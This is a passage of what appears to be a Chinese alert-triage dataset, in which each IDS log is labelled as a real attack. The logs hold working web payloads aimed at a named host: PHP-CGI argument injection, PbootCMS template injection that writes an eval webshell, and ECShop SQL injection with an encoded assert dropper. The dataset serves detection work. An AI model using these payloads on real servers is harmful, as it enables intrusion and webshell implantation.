"UE9TVCAvcGhwLWNnaS9waHAtY2dpLmV4ZT8lYWRkK2FsbG93X3VybF9pbmNsdWRlJTNkMSslYWRkK2F1dG9fcHJlcGVuZF9maWxlJTNkcGhwOi8vaW5wdXQgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiB6aC1jbg0KUmVmZXJlcjogaHR0cDovL3d3dy5obi5zZ2NjLmNuL3BocC1jZ2kvcGhwLWNnaS5leGU/JWFkZCthbGxvd191cmxfaW5jbHVkZSUzZDErJWFkZCthdXRvX3ByZXBlbmRfZmlsZSUzZHBocDovL2lucHV0DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvODMuMC40MTAzLjExNiBTYWZhcmkvNTM3LjM2DQpSRURJUkVDVC1TVEFUVVM6IDENCkNvbnRlbnQtTGVuZ3RoOiAyNQ0KSG9zdDogd3d3LmhuLnNnY2MuY24NCg0K", "req_body": "PD9waHAgZWNobyBtZDUoImNtZCIpOyA/Pg==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_4790ef825027f287add98d0d938f4aed", "access_time": "2024-11-27 10:10:45", "content-length": "25", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "redirect-status": "1", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "45.64.52.160", "dimension": "3", "url_path": "/php-cgi/php-cgi.exe", "src_mac": "00:94:a1:5e:6e:87", "file_name": "php-cgi.exe", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nReferer: http://www.hn.sgcc.cn/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36\r\nREDIRECT-STATUS: 1\r\nContent-Length: 25\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "<?php echo md5(\"cmd\"); ?>", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567955-PHP代码执行攻击", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Chrome/83.0.4103\", \"hw_type\": \"PC\"}}", "sport": "57962", "h_url": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673445", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "文件上传", "_origin": {"write_date": 1732673445, "vuln_harm": "攻击者通过文件上传获取一个webshell后,使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 5, "uri": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input", "dport": 80, "vuln_name": "发现脚本文件上传行为", "rsp_status": 0, "code_language": "通用", "solution": "1、文件上传的目录设置为不可执行权限\r\n2、判断文件类型,后缀名,内容等\r\n3、使用随机数改写文件名和文件路径", "hit_start": 0, "detail_info": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "xff": "", "sip": "45.64.52.160", "vuln_desc": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "public_date": "2018-08-20 18:32:27", "sport": 57962}, "detail_info": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "file_md5": "f1845ea9370448ca821d7a2f698ac3c7", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hn.sgcc.cn/php-cgi/{filename}", "first_access_time": "2024-11-27 10:10:45", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现脚本文件上传行为", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "00a9b2a8ad023d6ebf71c5bb98700a5d", "xff": "", "vuln_desc": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "attack_chain": "0x02010000", "vuln_harm": "攻击者通过文件上传获取一个webshell后,使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673426", "code_language": "通用", "public_date": "2018-08-20 18:32:27", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "5", "h_proto_version": "HTTP/1.1", "uri": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002055e", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", "referer": "http://www.hn.sgcc.cn/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input", "vlan_id": "", "vuln_type": "发现脚本文件上传行为", "attack_type": "文件上传", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、文件上传的目录设置为不可执行权限\r\n2、判断文件类型,后缀名,内容等\r\n3、使用随机数改写文件名和文件路径", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvcGhwLWNnaS9waHAtY2dpLmV4ZT8lYWRkK2FsbG93X3VybF9pbmNsdWRlJTNkMSslYWRkK2F1dG9fcHJlcGVuZF9maWxlJTNkcGhwOi8vaW5wdXQgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiB6aC1jbg0KUmVmZXJlcjogaHR0cDovL3d3dy5obi5zZ2NjLmNuL3BocC1jZ2kvcGhwLWNnaS5leGU/JWFkZCthbGxvd191cmxfaW5jbHVkZSUzZDErJWFkZCthdXRvX3ByZXBlbmRfZmlsZSUzZHBocDovL2lucHV0DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvODMuMC40MTAzLjExNiBTYWZhcmkvNTM3LjM2DQpSRURJUkVDVC1TVEFUVVM6IDENCkNvbnRlbnQtTGVuZ3RoOiAyNQ0KSG9zdDogd3d3LmhuLnNnY2MuY24NCg0K", "req_body": "PD9waHAgZWNobyBtZDUoImNtZCIpOyA/Pg==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_575aff7cce0f63de4840e839fc8e224a", "access_time": "2024-11-27 10:10:45", "content-length": "25", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16110000", "dip_addr": "局域网", "rsp_status": "0", "redirect-status": "1", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "45.64.52.160", "dimension": "3", "url_path": "/php-cgi/php-cgi.exe", "src_mac": "00:94:a1:5e:6e:87", "file_name": "php-cgi.exe", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nReferer: http://www.hn.sgcc.cn/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36\r\nREDIRECT-STATUS: 1\r\nContent-Length: 25\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "<?php echo md5(\"cmd\"); ?>", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567902-发现脚本文件上传行为", "rule_labels": "{\"0x110101\": {\"parent_id\": \"0x110100\", \"type\": \"攻击阶段\", \"name\": \"后门上传\", \"parent_name\": \"后门上传利用\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Chrome/83.0.4103\", \"hw_type\": \"PC\"}}", "sport": "57962", "h_url": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673429", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732673429, "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 0, "uri": "/?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue", "dport": 80, "vuln_name": "PHP代码执行攻击(机器学习)", "rsp_status": 0, "code_language": "PHP", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 0, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "xff": "", "sip": "45.64.52.160", "vuln_desc": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "public_date": "2020-11-25 19:53:49", "sport": 57294}, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "file_md5": "", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hn.sgcc.cn/", "first_access_time": "2024-11-27 10:10:29", "hazard_level": "6", "cookie": "lg=call_user_func", "hazard_rating": "高危", "hit_field": "", "h_method": "POST", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP代码执行攻击(机器学习)", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "6bcf11bf5b8af7f33daf847919529556", "xff": "", "vuln_desc": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "attack_chain": "0x02020000", "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673409", "code_language": "PHP", "public_date": "2020-11-25 19:53:49", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b70", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", "referer": "http://www.hn.sgcc.cn/?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue", "vlan_id": "", "vuln_type": "PHP代码执行攻击(机器学习)", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvP3RhZy9pbmRleD0mdGFnPXtwYm9ob21lL0luZGV4b3Q6aWYoMSkodXNvcnQvKiUzZSovKHBvc3QvKiUzZSovKC8qJTNlKi8xKSxjcmVhdGVfZnVuY3Rpb24vKiUzZSovKC8qJTNlKi9wb3N0LyolM2UqLygvKiUzZSovMikscG9zdC8qJTNlKi8oLyolM2UqLzMpKSkpOy8vKX0oMTIzKXsvcGJob21lL0luZGV4b290OmlmfSZ0YWdzdHBsPW5ld3MuaHRtbCZsbm9jMnRzcGZhcjFfdWUgSFRUUC8xLjENCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkFjY2VwdDogKi8qDQpDb29raWU6IGxnPWNhbGxfdXNlcl9mdW5jDQpSZWZlcmVyOiBodHRwOi8vd3d3LmhuLnNnY2MuY24vP3RhZy9pbmRleD0mdGFnPXtwYm9ob21lL0luZGV4b3Q6aWYoMSkodXNvcnQvKiUzZSovKHBvc3QvKiUzZSovKC8qJTNlKi8xKSxjcmVhdGVfZnVuY3Rpb24vKiUzZSovKC8qJTNlKi9wb3N0LyolM2UqLygvKiUzZSovMikscG9zdC8qJTNlKi8oLyolM2UqLzMpKSkpOy8vKX0oMTIzKXsvcGJob21lL0luZGV4b290OmlmfSZ0YWdzdHBsPW5ld3MuaHRtbCZsbm9jMnRzcGZhcjFfdWUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84My4wLjQxMDMuMTE2IFNhZmFyaS81MzcuMzYNCkNvbnRlbnQtTGVuZ3RoOiAyNjgNCkhvc3Q6IHd3dy5obi5zZ2NjLmNuDQoNCg==", "req_body": "MVtdPWFudm5kLnBocCYxW109TjNCdVpHVmhQRDl3YUhBZ1kyeGhjM01nUjJGTk1UQm1RVFVnZXlCd2RXSnNhV01nWm5WdVkzUnBiMjRnWDE5amIyNXpkSEoxWTNRb0pFZzNiWFUyS1hzZ1FHVjJZV3dvSWk4cVdrYzFlbXR1VW1aVGF5b3ZJaTRrU0RkdGRUWXVJaUlwT3lCOWZXNWxkeUJIWVUweE1HWkJOU2drWDFKRlVWVkZVMVJiSjAwblhTazdQejQlM0QmMj0kYSwkYiYzPXJldHVybiB2YXJfZHVtcChmaWxlX3B1dF9jb250ZW50cygkYixiYXNlNjRfZGVjb2RlKCRhKSkpOw==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "cache-control": "max-age=0", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_7315c8d3e59d7592251691df7ed0718f", "access_time": "2024-11-27 10:10:29", "content-length": "268", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "45.64.52.160", "dimension": "3", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue HTTP/1.1\r\nCache-Control: max-age=0\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nCookie: lg=call_user_func\r\nReferer: http://www.hn.sgcc.cn/?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36\r\nContent-Length: 268\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "1[]=anvnd.php&1[]=N3BuZGVhPD9waHAgY2xhc3MgR2FNMTBmQTUgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg3bXU2KXsgQGV2YWwoIi8qWkc1emtuUmZTayovIi4kSDdtdTYuIiIpOyB9fW5ldyBHYU0xMGZBNSgkX1JFUVVFU1RbJ00nXSk7Pz4%3D&2=$a,$b&3=return var_dump(file_put_contents($b,base64_decode($a)));", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569456-PHP代码执行攻击(机器学习)", "rule_labels": "{}", "sport": "57294", "h_url": "/?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673425", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732673425, "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.55", "site_app": "", "hit_end": 0, "uri": "/user.php?act=login", "dport": 80, "vuln_name": "SQL注入攻击(机器学习)", "rsp_status": 0, "code_language": "", "solution": "如下一些方法能够防止注入攻击:\r\n\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n\r\n2.部署Web应用防火墙;\r\n\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": 0, "detail_info": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "xff": "", "sip": "45.64.52.160", "vuln_desc": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "public_date": "2020-11-25 19:52:52", "sport": 59279}, "detail_info": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "file_md5": "42dabbc0105eb5e97b59d9e914fe4a74", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hn.sgcc.cn/user.php", "first_access_time": "2024-11-27 10:10:25", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "GET", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "SQL注入攻击(机器学习)", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "f5713ea2cac1dbcda68d89e4071b4d63", "xff": "", "vuln_desc": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "attack_chain": "0x02020000", "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673406", "code_language": "", "public_date": "2020-11-25 19:52:52", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/user.php?act=login", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b69", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)", "referer": "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:617:\"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325632646d46734c6e426f634363734a7a772f6347687749474e7359584e7a49456468545445775a6b4531494873676348566962476c6a49475a31626d4e306157397549463966593239756333527964574e304b4352494e3231314e696c374945426c646d46734b4349764b6c70484e587072626c4a6d553273714c7949754a456733625855324c6949694b547367665831755a5863675232464e4d54426d5154556f4a4639535256465652564e55577a45794d3130704f7a382b4d4456684d54466b4e6a5578596d4d785a5455324e6d4d305a5363702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/*\";}45ea207d7a2b68c49582d2d22adf953a", "vlan_id": "", "vuln_type": "SQL注入攻击(机器学习)", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "act": "login", "solution": "如下一些方法能够防止注入攻击:\r\n\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n\r\n2.部署Web应用防火墙;\r\n\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC91c2VyLnBocD9hY3Q9bG9naW4gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpSZWZlcmVyOiA0NWVhMjA3ZDdhMmI2OGM0OTU4MmQyZDIyYWRmOTUzYWFkc3xhOjI6e3M6MzoibnVtIjtzOjYxNzoiKi9TRUxFQ1QgMSwweDJkMzEyNzIwNTU0ZTQ5NGY0ZTJmMmEsMiw0LDUsNiw3LDgsMHg3YjI0NjE3MzY0Mjc1ZDNiNjE3MzczNjU3Mjc0Mjg2MjYxNzM2NTM2MzQ1ZjY0NjU2MzZmNjQ2NTI4Mjc1YTZkNmM3MzVhNTYzOTc3NjQ1ODUyNjY1OTMyMzk3NTY0NDc1Njc1NjQ0ODRkNmY0YTMyNTYzMjY0NmQ0NjczNGM2ZTQyNmY2MzQzNjM3MzRhN2E3NzJmNjM0NzY4Nzc0OTQ3NGU3MzU5NTg0ZTdhNDk0NTY0Njg1NDU0NDU3NzVhNmI0NTMxNDk0ODczNjc2MzQ4NTY2OTYyNDc2YzZhNDk0NzVhMzE2MjZkNGUzMDYxNTczOTc1NDk0NjM5NjY1OTMyMzk3NTYzMzM1Mjc5NjQ1NzRlMzA0YjQzNTI0OTRlMzIzMTMxNGU2OTZjMzc0OTQ1NDI2YzY0NmQ0NjczNGI0MzQ5NzY0YjZjNzA0ODRlNTg3MDcyNjI2YzRhNmQ1NTMyNzM3MTRjNzk0OTc1NGE0NTY3MzM2MjU4NTUzMjRjNjk0OTY5NGI1NDczNjc2NjU4MzE3NTVhNTg2MzY3NTIzMjQ2NGU0ZDU0NDI2ZDUxNTQ1NTZmNGE0NjM5NTM1MjU2NDY1NjUyNTY0ZTU1NTc3YTQ1Nzk0ZDMxMzA3MDRmN2EzODJiNGQ0NDU2Njg0ZDU0NDY2YjRlNmE1NTc4NTk2ZDRkNzg1YTU0NTUzMjRlNmQ0ZDMwNWE1MzYzNzAyNzI5MjkzYjJmMmY3ZDc4Nzg3OCwxMC0tIC0iO3M6MjoiaWQiO3M6MTE6Ii0xJyBVTklPTi8qIjt9NDVlYTIwN2Q3YTJiNjhjNDk1ODJkMmQyMmFkZjk1M2ENClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjEpDQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_87af1125647c4a1949bb3a12e1048bef", "access_time": "2024-11-27 10:10:25", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", 